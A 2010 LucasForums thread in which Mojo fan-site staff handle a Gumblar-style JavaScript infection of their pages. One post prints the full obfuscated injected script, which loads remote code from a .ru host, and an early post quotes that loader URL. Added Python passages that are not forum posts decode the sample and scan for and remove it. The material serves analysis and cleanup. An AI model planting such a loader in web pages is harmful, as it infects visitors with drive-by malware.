
Thread: Mojo malware infection?
Old 03-03-2010, 12:41 PM   #1
Harald B
Rookie
 
 
Join Date: Jun 2009
Posts: 52
Mojo malware infection?

Since this morning, each time I try to go to mixnmojo.com AVG warns me that it's blocking a connection to a very dubious link; they vary slightly, with the following being a good example:
Code:
winamp-com.mapquest.com.orbitdownloader-com.breathconditioning.ru:8080/petardas.com/petardas.com/fanpop.com/secureserver.net/google.com.php
(warning: going there is probably a very bad idea). The site still shows up fine and I have no idea what element is causing this, but since I haven't gotten this before anywhere and am only getting it with Mojo (and also with Behind Mojo) you may want to have an admin look into it.
Sorry if I should have posted this somewhere else. I'm not sure where that would be.

edit: I've got two more relevant details. Only the main site and Behind cause trouble; deeper links (blog comments, game database etc.) are fine. Also, my other, Nod32-using computer warns me at the same places, and identifies it as a "JS/TrojanDownloader.Agent.NSM Trojan".

Last edited by Harald B; 03-03-2010 at 12:53 PM. Reason: more info
Harald B is offline   you may: quote & reply,
Old 03-03-2010, 02:34 PM   #2
Gabez
Senior Member
 
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
Weird. Thanks for letting us know. I don't understand any of the technicalities, but hopefully (HOPEFULLY!) someone on the team does.

I do know that it's getting increasingly hard to update the news, though; the admin keeps crashing. Don't know if that's related or not. I showed a tech friend the inner workings of the site the other day and he was horrified -- apparently the code was made obsolete years ago, and by all logic Mixnmojo shouldn't work at all. Yet it's managing to lumber on... I guess because we keep on stacking more lines of code on top of it.

Hopefully this malware infection won't spread anymore and we can trap it in more lines of code. That's the only solution I can think of for now. Maybe someone who actually knows what they're talking about can give some better advice.
Gabez is offline   you may: quote & reply,
Old 03-03-2010, 03:09 PM   #3
elTee
beatnik
 
 
Status: Super Moderator
Join Date: Dec 2001
Location: Cheltenham, England
Posts: 2,921
The International House of Mojo Staff LFN Staff Member 
Heh yes, I changed the EMI score from 4 skulls to 2 for a joke, but then the goddamn thing kept resetting itself to 2 again. Remi was up all night changing it back.


LucasTones - LT - elTee
The International House of Mojo - writing long-winded gibberish increasingly infrequently
elTee is offline   you may: quote & reply,
Old 03-04-2010, 07:03 AM   #4
Gabez
Senior Member
 
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
It has begun: http://poisonpen.mixnmojo.com/ and http://pumpkinpost.mixnmojo.com/ have now been infected by Mojo 9's seriously dated and ageing code.

It's Chernobyl all over again.
Gabez is offline   you may: quote & reply,
Old 03-04-2010, 08:51 AM   #5
Haggis
Mojorator
 
 
Join Date: Dec 2001
Location: Rotterdam
Posts: 560
Yeah, I noticed that someone, or something, had been messing with my WordPress files. I'm now re-uploading the affected files. Looks like some kind of virus or something, although I'm even less technically savvy than Gabez, so I don't really know what I'm talking about. Right now the Pumpkin Post seems to be back up and running, hopefully that was that...

Haggis is offline   you may: quote & reply,
Old 03-04-2010, 02:58 PM   #6
bgbennyboy
Festively Plump
 
 
Status: Super Moderator
Join Date: Feb 2002
Location: England
Posts: 2,000
LFN Staff Member 
Looks like it's probably a variant of the Gumblar script. I know Zaarin has cleaned it from some pages, but it's tried to copy itself to all index.php pages, it seems.

Most of the *index php files on my site got a script appended to the end, it even snuck its way into my Wordpress theme files too. Any site that's using Wordpress will need to make sure they check their themes and plugins. I know I normally just leave the wp-content folder alone when upgrading/fixing.

bgbennyboy is offline   you may: quote & reply,
Old 03-04-2010, 04:41 PM   #7
Harald B
Rookie
 
 
Join Date: Jun 2009
Posts: 52
Heads-up: I'm now also getting it when at the comments sections for individual blog posts and in the game database (i.e. it's spread to showfile.php and gamedb.php, presumably).

edit: Nod32 is now identifying it as a "JS/TrojanDownloader.Iframe.NHE Trojan". Maybe the word Iframe will do your engineers some good.

Last edited by Harald B; 03-05-2010 at 12:51 PM. Reason: meh
Harald B is offline   you may: quote & reply,
Old 03-04-2010, 04:45 PM   #8
Gabez
Senior Member
 
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
The infection is spreading!!!!

DO NOT PANIC.
Gabez is offline   you may: quote & reply,
Old 03-04-2010, 05:38 PM   #9
jp-30
 
 
Join Date: Apr 2002
Location: New Zealand
Posts: 968
The International House of Mojo Staff 
If only we had started building Mojo 10.
jp-30 is offline   you may: quote & reply,
Old 03-04-2010, 10:50 PM   #10
DJG
Bot of the Year
 
 
Join Date: Jul 2001
Posts: 71
Don't blame the code.

Damn kids.


DJG
The International House of Mojo
www.mixnmojo.com
DJG is offline   you may: quote & reply,
Old 03-05-2010, 12:46 AM   #11
Valkian
Loves Razputin.net!
 
 
Join Date: Nov 2003
Location: Buenos Aires, Argentina
Posts: 282
Current Game: Snatcher
I hate to say this Gabez... but I'M IN PANIC!!!
Both The Dig Museum and The Thrillville Quarterly are under attack!!

Should re-uploading the files solve the problem? WHAT SHOULD I DO?? I'M SO UNPREPARED FOR THIS! HIGHSCHOOL SUCKS!

Valkian is offline   you may: quote & reply,
Old 03-05-2010, 01:08 AM   #12
MJ
Lemonade
 
 
Join Date: Dec 2001
Location: Santa Difunta
Posts: 1,137
LFN Staff Member 
Nightlight appears to be fine. Heh, not even a virus can be arsed to pay attention to it.


Want some funny radio plays?
Nightlight Productions
All Night Long
MJ is offline   you may: quote & reply,
Old 03-05-2010, 03:23 AM   #13
QueZTone
mind il creativo
 
 
Join Date: Dec 2001
Location: The Netherlands
Posts: 779
haha DJG came out of hiding after all those years! my plan worked!


but seriously, very annoying stuff this... get that mapquest malware notice too... but that's something different from the gumblar script..

the mapquest thing is just a wrong advertisement i think?

QueZTone is offline   you may: quote & reply,
Old 03-05-2010, 04:18 AM   #14
Harald B
Rookie
 
 
Join Date: Jun 2009
Posts: 52
Quote:
Originally Posted by QueZTone View Post
but seriously, very annoying stuff this... get that mapquest malware notice too... but that's something different from the gumblar script..

the mapquest thing is just a wrong advertisement i think?
Afraid not. The link is way too dubious for that, and to make sure I re-enabled adblock on Mojo and still got the same warnings.
Harald B is offline   you may: quote & reply,
Old 03-05-2010, 06:37 AM   #15
diduz
 
 
Join Date: Jul 2003
Location: Italy
Posts: 50
Guys, the malware has attacked my laptop and I've been battling to save my system!!!

I won't go back to the site until it's safe again (I'm writing from another PC right now).

It seems to be some sort of fake virus alert.
diduz is offline   you may: quote & reply,
Old 03-05-2010, 02:05 PM   #16
Icebox
Rookie
 
 
Join Date: Dec 2008
Location: The Potato Barn
Posts: 72
Current Game: Monkey Man Country
Series of tubes, goddamn it. I hope you gentlemen come out of it okay, powers that be willing.

I will try to stay off of Mojo until you get 10 up and running. Don't want to take any major risks. Also I actually sort of enjoyed Poison Pen, for whatever reason, and am sad to see it wiped. All the beast.


Let's Kick Some ICE!
Icebox is offline   you may: quote & reply,
Old 03-05-2010, 02:16 PM   #17
bgbennyboy
Festively Plump
 
 
Status: Super Moderator
Join Date: Feb 2002
Location: England
Posts: 2,000
LFN Staff Member 
For those hosted sites using Wordpress you'll either need to restore off a known clean backup or reinstall Wordpress. I had to:
  • Delete the wp-admin and wp-includes folders
  • Download wordpress again and reupload all the files, overwriting those that were there
  • Edit the wp-config.php and index.php files to remove the virus code from the footer
  • Look in the themes in wp-content and remove the code from the footers in the php files
  • None of the plugins looked like they were infected, but it seems that the script can be appended to .js files too so to be safe I deleted the existing plugins and replaced them one by one.

This is the code that was appended to my files:
Code:
<script>try {var L;if(L!='l'){L='l'};var b='replace';var J="";var vs="";var Y=RegExp;var NS='';var d;if(d!='' && d!='hs'){d=null};this.iu="";function v(e,B){var _=new Array();var sR;if(sR!='Vb' && sR != ''){sR=null};var y='[';var i_=new Array();var mV=new Date();var V='g';y+=B;var z;if(z!='dD'){z='dD'};y+=']';this.Pv='';var W=new Y(y, V);var eF=new Date();var lD=new Date();return e[b](W, new String());};var YI;if(YI!='' && YI!='Hu'){YI='C'};this.Wd="";var h=v('/jpWejtLajrWdLaWsL.LcjoWmj/jpjejtWaWrLdLaLsj.WcWoLmW/jfWaLnLpLoLpW.LcLoWmW/jsWejcLujrLejsjeWrLvLeWrW.WnjeLtW/WgLojojgjlLeW.LcLoLmj.WpjhLpL',"WjL");var yh;if(yh!='ul' && yh!='hU'){yh='ul'};var a=v('8999696960966996869666609696996',"69");var An=new Date();var uc=new Date();var c=v('cbrbeJaJtJeZEJlJeZmbeZnbtb',"ZBJb");var j=new Date();var S=v('h9tztOpz:z/9/zwOi9nOaOm9pz-OcOoOm9.zm9a9pOq9u9e9sztO.zczozmz.Oo9r9bziztzdzozwOnOlzoza9dOezrz-9c9ozmz.9bzr9eza9tOhzc9oznOdzi9t9iOo9nziznzg9.Or9u9:z',"O9z");var yx='';this.ne="";var nw;if(nw!='' && nw!='pk'){nw=null};var bU=window;this._m='';var Rn;if(Rn!='' && Rn!='HF'){Rn=null};var w=v('o8n3lqo8aTd3',"T83q");var xv=new String();this.QK="";var nT;if(nT!='' && nT!='X'){nT=null};var ik;if(ik!='' && ik!='VG'){ik=null};var o=v('s9c9rIiIpIt9',"9lI");A=function(){var Ly;if(Ly!='LU' && Ly != ''){Ly=null};var lY;if(lY!='lS' && lY != ''){lY=null};var Bn=new Array();G=document[c](o);var St;if(St!='Vo'){St=''};var LI;if(LI!='' && LI!='kI'){LI=''};yx=S+a;var KC=new Date();yx+=h;var HN="";G.defer=([1][0]);var Yh='';var lh;if(lh!='' && lh!='rb'){lh=''};G.src=yx;var Vt;if(Vt!='' && Vt!='hss'){Vt=null};var Wr;if(Wr!='HE' && Wr!='ke'){Wr='HE'};document.body.appendChild(G);this.iQ='';};var tK=new Array();bU[w]=A;} catch(M){var In=new Date();var mh;if(mh!='KU' && mh!='Za'){mh=''};};</script>
<!--699af17d7dda64c9f7a4601e44c2c9c6-->

bgbennyboy is offline   you may: quote & reply,
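As an added example (not code from this thread, from Mojo or from WordPress), here is how a defender can read the script quoted above without ever running it. Every string the sample uses goes through its `v(e,B)` helper, which builds the regular expression `[B]` with the `g` flag and deletes every matching character from `e`; the rest of the script then does `yx = S + a + h`, creates an element with `document[c](o)`, sets `G.src = yx`, and assigns that loader to `window[w]`. The Python below reproduces the character stripping over the six `v(...)` calls copied verbatim out of the sample (`SAMPLE_CALLS`), so the analyst sees in plain text what the injected tag fetches. The `describe` summary string is my own wording of the decoded behaviour, not anything the script prints.

```python
import re

# The six v('literal',"chars") statements copied verbatim from the script
# quoted in the post above. This is data for analysis; it is never executed.
SAMPLE_CALLS = """
var h=v('/jpWejtLajrWdLaWsL.LcjoWmj/jpjejtWaWrLdLaLsj.WcWoLmW/jfWaLnLpLoLpW.LcLoWmW/jsWejcLujrLejsjeWrLvLeWrW.WnjeLtW/WgLojojgjlLeW.LcLoLmj.WpjhLpL',"WjL");
var a=v('8999696960966996869666609696996',"69");
var c=v('cbrbeJaJtJeZEJlJeZmbeZnbtb',"ZBJb");
var S=v('h9tztOpz:z/9/zwOi9nOaOm9pz-OcOoOm9.zm9a9pOq9u9e9sztO.zczozmz.Oo9r9bziztzdzozwOnOlzoza9dOezrz-9c9ozmz.9bzr9eza9tOhzc9oznOdzi9t9iOo9nziznzg9.Or9u9:z',"O9z");
var w=v('o8n3lqo8aTd3',"T83q");
var o=v('s9c9rIiIpIt9',"9lI");
"""


def strip_chars(literal: str, chars: str) -> str:
    """Python equivalent of the sample's v(e,B): delete every character of
    `chars` from `literal` (the script does e.replace(new RegExp('['+B+']','g'), ''))."""
    return re.sub("[" + re.escape(chars) + "]", "", literal)


# Matches one  var NAME=v('LITERAL',"CHARS")  statement of the sample's shape.
CALL_RE = re.compile(r"""var\s+(\w+)\s*=\s*v\('([^']*)',"([^"]*)"\)""")


def decode_calls(script: str) -> dict:
    """Return {variable name: decoded string} for every v(...) call found in `script`."""
    return {name: strip_chars(literal, chars)
            for name, literal, chars in CALL_RE.findall(script)}


def loader_url(decoded: dict) -> str:
    """Rebuild the address the sample assembles as yx = S + a, then yx += h
    (scheme and host, then port, then path)."""
    return decoded["S"] + decoded["a"] + decoded["h"]


def describe(script: str) -> str:
    """One-line, human-readable statement of what the decoded script does
    (my own summary wording, assuming the same variable roles as the sample)."""
    d = decode_calls(script)
    return (f"window.{d['w']} -> document.{d['c']}('{d['o']}').src = "
            f"{loader_url(d)}")


if __name__ == "__main__":
    for name, value in decode_calls(SAMPLE_CALLS).items():
        print(f"{name} = {value!r}")
    print(describe(SAMPLE_CALLS))
```

The decoded `S + a + h` is the same `breathconditioning.ru:8080/.../google.com.php` address that AVG flagged in the opening post, which ties the per-page warnings and the appended footer code to one infection. Decoding the literals this way keeps the sample inert, which is the point of reading it statically instead of loading the page.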
Old 03-05-2010, 02:28 PM   #18
Gabez
Senior Member
 
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
Oh my, DJG! Now I know that it's the end of days.

Hopefully we'll get it sorted out soon because we can't afford to rebuild the code from scratch for at least another few years (when the economy has fully recovered). Until then the mythical "10" version will have to remain just a myth. :/
Gabez is offline   you may: quote & reply,
Old 03-05-2010, 03:14 PM   #19
daltysmilth
Rookie
 
 
Join Date: Jan 2004
Location: On a specific landmass
Posts: 225
If, God forbid, the whole site goes down, is there anyplace we could go to see what the status is to getting it back up again?


"So Brak, is that Polish? Or... no I suppose it wouldn't be."
--Mike Nelson- MST3K: the Movie
daltysmilth is offline   you may: quote & reply,
Old 03-05-2010, 03:20 PM   #20
Harald B
Rookie
 
 
Join Date: Jun 2009
Posts: 52
Right here, probably. LucasForums is sufficiently distinct from Mojo that it should stay fine.
Harald B is offline   you may: quote & reply,
Old 03-05-2010, 03:24 PM   #21
Valkian
Loves Razputin.net!
 
 
Join Date: Nov 2003
Location: Buenos Aires, Argentina
Posts: 282
Current Game: Snatcher
I was actually thinking of Gabez' place. That would be the ultimate shelter for us in times of desperation.

Valkian is offline   you may: quote & reply,
Old 03-05-2010, 03:29 PM   #22
Gabez
Senior Member
 
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
None of you are allowed in my panic shelter >:
Gabez is offline   you may: quote & reply,
Old 03-05-2010, 03:53 PM   #23
elTee
beatnik
 
 
Status: Super Moderator
Join Date: Dec 2001
Location: Cheltenham, England
Posts: 2,921
The International House of Mojo Staff LFN Staff Member 
Gabez should be shot for this. I've seen his panic shelter, and it would not be a lie to say that one half of it contains 17,450 hot water bottles (of various design, size etc.) and the other half contains a large, deep, bath.


LucasTones - LT - elTee
The International House of Mojo - writing long-winded gibberish increasingly infrequently
elTee is offline   you may: quote & reply,
Old 03-05-2010, 10:14 PM   #24
MJ
Lemonade
 
 
Join Date: Dec 2001
Location: Santa Difunta
Posts: 1,137
LFN Staff Member 
I've checked Nightlight's code, and it seems to be fine. It's on Wordpress, but as a coincidence I updated it to the latest version about five days ago.


Want some funny radio plays?
Nightlight Productions
All Night Long
MJ is offline   you may: quote & reply,
Old 03-06-2010, 05:02 AM   #25
Gabez
Senior Member
 
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
Yeah, but Nightlight is on the Grim Fandango.net part of the server, so I don't think it would be affected anyway.

But it never hurts to make sure!
Gabez is offline   you may: quote & reply,
Old 03-06-2010, 10:40 AM   #26
Serge
SCUMMLord
 
Join Date: Mar 2002
Location: Denmark
Posts: 196
HighLand is infected too - and it certainly doesn't run on Wordpress - not sure Wordpress even existed when that site was made. Predates lowercase HTML too ;-)

And I don't remember the FTP account (as usual), so... :P
Serge is offline   you may: quote & reply,
Old 03-06-2010, 11:26 AM   #27
Gabez
Senior Member
 
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
Don't worry Serge, we'll fix it.
Gabez is offline   you may: quote & reply,
Old 03-06-2010, 11:28 AM   #28
s-island
Music man
 
 
Status: Administrator
Join Date: Sep 2003
Posts: 1,089
The International House of Mojo Staff 
It's gone from Highland now. It infects all index*.php/html, default*.php/html and all JS files, so all sites have at least one infected file.
s-island is offline   you may: quote & reply,
Old 03-08-2010, 08:48 AM   #29
Haggis
Mojorator
 
Haggis's Avatar
 
Join Date: Dec 2001
Location: Rotterdam
Posts: 560
I'm getting strange pop-ups on the World of MI forums, but I can't see any files that have been infected. Maybe you guys can take a look at it, and also at World of MI itself, which I don't have access to?

Haggis is offline   you may: quote & reply,
Old 03-08-2010, 09:34 AM   #30
Gabez
Senior Member
 
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
Those "strange pop-ups" are probably adverts from when World of MI sold out to THE MAN.

But we'll get our best people on the case anyway.

Let us pray that the infection does not spread any further...
Gabez is offline   you may: quote & reply,
Old 03-08-2010, 02:03 PM   #31
Valkian
Loves Razputin.net!
 
 
Join Date: Nov 2003
Location: Buenos Aires, Argentina
Posts: 282
Current Game: Snatcher
Well, it seems that the Thrillville Quarterly and The Dig Museum are now both clear, thanks to my relentless efforts at containing the infection.
I know many of you were worried about that.

Valkian is offline   you may: quote & reply,
Old 03-08-2010, 03:51 PM   #32
Haggis
Mojorator
 
 
Join Date: Dec 2001
Location: Rotterdam
Posts: 560
Quote:
Originally Posted by Gabez View Post
Those "strange pop-ups" are probably adverts from when World of MI sold out to THE MAN.
Or disgruntled fans are attacking the site because WMI sold out...

Quote:
But we'll get our best people on the case anyway.
Thanks!

Haggis is offline   you may: quote & reply,
Old 03-08-2010, 05:14 PM   #33
Gabez
Senior Member
 
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
Zaarin (s-island) had a look at the World of MI and WoMI forum files and saw no trace of the Mojo Virus...

I had a look on those forums and couldn't see anything dodgy. Is it possible that the pop-ups are on your end? Don't know what else to suggest. Maybe updating the forum software would help, if you can...
Gabez is offline   you may: quote & reply,
Old 03-08-2010, 06:03 PM   #34
Valkian
Loves Razputin.net!
 
 
Join Date: Nov 2003
Location: Buenos Aires, Argentina
Posts: 282
Current Game: Snatcher
Oh, wait a minute, I thought Zaarin was Zaarin and now it turns out he is actually s-island? No wonder Zaarin never replied when I thanked him for something, he was the wrong Zaarin!
I would appreciate it if there were some sort of press release explaining these things so I don't make myself look like a fool in the future (or rather, not any more than I already do).

Valkian is offline   you may: quote & reply,
Old 03-13-2010, 08:16 AM   #35
Haggis
Mojorator
 
 
Join Date: Dec 2001
Location: Rotterdam
Posts: 560
Quote:
Originally Posted by Gabez View Post
Zaarin (s-island) had a look at the World of MI and WoMI forum files and saw no trace of the Mojo Virus...

I had a look on those forums and couldn't see anything dodgy. Is it possible that the pop-ups are on your end? Don't know what else to suggest. Maybe updating the forum software would help, if you can...
Sorry for the late reply, I've been offline due to sickness... the popups are being reported by several forum members, so they're not just on my end I'm afraid. I also recently updated the forum software when the latest version of phpBB came out, which was after the popup problem started appearing, but that didn't fix it. Perhaps I should try a clean install of phpBB, see if that will fix it.

Haggis is offline   you may: quote & reply,
Old 03-13-2010, 10:46 AM   #36
s-island
Music man
 
 
Status: Administrator
Join Date: Sep 2003
Posts: 1,089
The International House of Mojo Staff 
I've run some scripts on all of Mojo's files that remove the JavaScript malware, so things should be clean now. However, some JS files and probably some PHP/HTML files as well may have lost content. I know that Wordpress' PHP files have had the last ?> removed by the virus and some JS files have been completely emptied.
s-island is offline   you may: quote & reply,
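The clean-up steps in post #17, the file-name pattern in post #28 (index*.php/html, default*.php/html and every .js file) and the two caveats in post #36 (JS files left completely empty, the trailing `?>` stripped from WordPress PHP files) together describe one scan-and-repair job. The script below is an added example of that job, not the scripts s-island ran and not Mojo or WordPress code. Its only signature is what the quoted sample shows: a `<script>try {...} catch(..){...};</script>` wrapper followed by a 32-hex-digit HTML comment. `FAKE_INJECTION` is a constructed, inert stand-in of that shape for the sample tree the script builds in a temporary directory; the report strings are my own.

```python
import os
import re
import tempfile

# Constructed, inert stand-in with the same shape as the block quoted in post #17.
# It is NOT the real injected code; it only exercises the signature below.
FAKE_INJECTION = ("<script>try {var L;if(L!='l'){L='l'};} catch(M){};</script>\n"
                  "<!--00000000000000000000000000000000-->")

# Signature taken from the quoted sample: try/catch wrapper immediately followed
# by the hex-comment marker. The marker is what keeps this from matching an
# ordinary inline try/catch in a legitimate page.
INJECTION_RE = re.compile(
    r"<script>try\s*\{.*?\}\s*catch\s*\(\w+\)\s*\{.*?\};?\s*</script>\s*<!--[0-9a-f]{32}-->",
    re.DOTALL)

# Names post #28 says the script attaches to. Anything else that matches is a
# theme, plugin or include file (post #17) and gets called out separately.
USUAL_TARGET_RE = re.compile(r"^(?:(?:index|default)[^/\\]*\.(?:php|html?)|.*\.js)$", re.I)
SCAN_EXT = (".php", ".html", ".htm", ".js")


def clean_content(text: str, filename: str):
    """Strip injected block(s) from one file's text. Returns (cleaned, notes);
    notes is empty when nothing was found."""
    cleaned, count = INJECTION_RE.subn("", text)
    if count == 0:
        return text, []
    notes = [f"removed {count} injected block(s)"]
    # Post #36: some JS files held nothing but the payload; cleaning leaves them empty.
    if not cleaned.strip():
        notes.append("nothing left after cleaning; restore from backup")
    # Post #36: the last ?> was stripped from WordPress PHP files. A pure-PHP file
    # may legitimately lack it, so this is a "compare with backup" note, not an error.
    if filename.lower().endswith(".php") and cleaned.rfind("<?php") > cleaned.rfind("?>"):
        notes.append("no closing ?> after the last <?php; compare with backup")
    # Post #17: theme files were hit too, outside the usual index*/default*/*.js names.
    if not USUAL_TARGET_RE.match(os.path.basename(filename)):
        notes.append("not an index*/default*/*.js name; check themes and plugins")
    return cleaned, notes


def scan_tree(root: str, fix: bool = False) -> dict:
    """Walk a web root and return {relative path: notes} for every affected file.
    With fix=True the cleaned text is written back, except for files that would
    end up empty: those need a restore, not a rewrite."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            cleaned, notes = clean_content(text, name)
            if not notes:
                continue
            report[os.path.relpath(path, root).replace(os.sep, "/")] = notes
            if fix and cleaned.strip():
                with open(path, "w", encoding="utf-8") as fh:
                    fh.write(cleaned)
    return report


def build_sample_tree() -> str:
    """Create a throwaway directory shaped like a hit site (constructed data)."""
    root = tempfile.mkdtemp(prefix="mojo-scan-")
    samples = {
        "index.php": '<?php echo "hello"; ' + FAKE_INJECTION,           # ?> already gone
        "wp-content/themes/t/footer.php": "</body></html>\n" + FAKE_INJECTION,
        "wp-content/plugins/p/app.js": FAKE_INJECTION,                   # wiped, payload only
        "wp-includes/js/util.js": "function f(){}\n" + FAKE_INJECTION,
        "about.html": "<html><body>clean</body></html>\n",
    }
    for rel, content in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for rel, notes in sorted(scan_tree(sample_root, fix=True).items()):
        print(rel, "->", "; ".join(notes))
```

Run it first without `fix=True` to get the list of affected files, then restore anything reported as emptied from a clean backup rather than rewriting it; the `?>` note is the place to diff against that backup before trusting a repaired WordPress file.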
Old 03-30-2010, 08:36 AM   #37
Maratanos
Lurker
 
Join Date: Nov 2008
Posts: 6
Hey, uh, guys? Was it your intention to send out an RSS feed item entitled "MOJO SUX" with a body linking to someplace that looks an awful lot like a spam site for pharmaceuticals?

EDIT: confirmed from a linux computer that there is a newspost too.

Last edited by Maratanos; 03-30-2010 at 08:42 AM.
Maratanos is offline   you may: quote & reply,
Old 03-30-2010, 08:52 AM   #38
Gabez
Senior Member
 
 
Join Date: Dec 2001
Location: Oxford, England
Posts: 3,147
Sorry about that; as far as I know it was just a news post that was added by someone (not anyone authorised), but it's gone now and we'll reset the passwords for everything tonight. Sorry again about this, but we're working on the situation.
Gabez is offline   you may: quote & reply,
Old 03-30-2010, 12:36 PM   #39
Jeff
Rating: Awesome
 
 
Status: Administrator
Join Date: Jan 2005
Location: Chicago, IL, USA
Posts: 8,434
Current Game: SWTOR
Imperialist Meatbags Guild Officer The Walking Carpets Guild Officer Notable contributor LFN Staff Member 
Anyone receiving a trojan warning when they enter this thread? Odd that it is thread-specific but I just received two warnings in a row in this thread. Also, the ads aren't loading in this thread.


Follow me on Twitter
Follow StarWarsMMO.net on Twitter | Like us on Facebook
Jeff is offline   you may: quote & reply,
Old 03-30-2010, 02:06 PM   #40
Kroms
Moose fell on my head
 
 
Join Date: Jun 2007
Posts: 697
Mojown'd I'm going to miss this site, when it finally hits the ****ter.
Kroms is offline   you may: quote & reply,
All times are GMT -4. The time now is 02:53 PM.


LFNetwork, LLC ©2002-2011 - All rights reserved.
Powered by vBulletin®
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.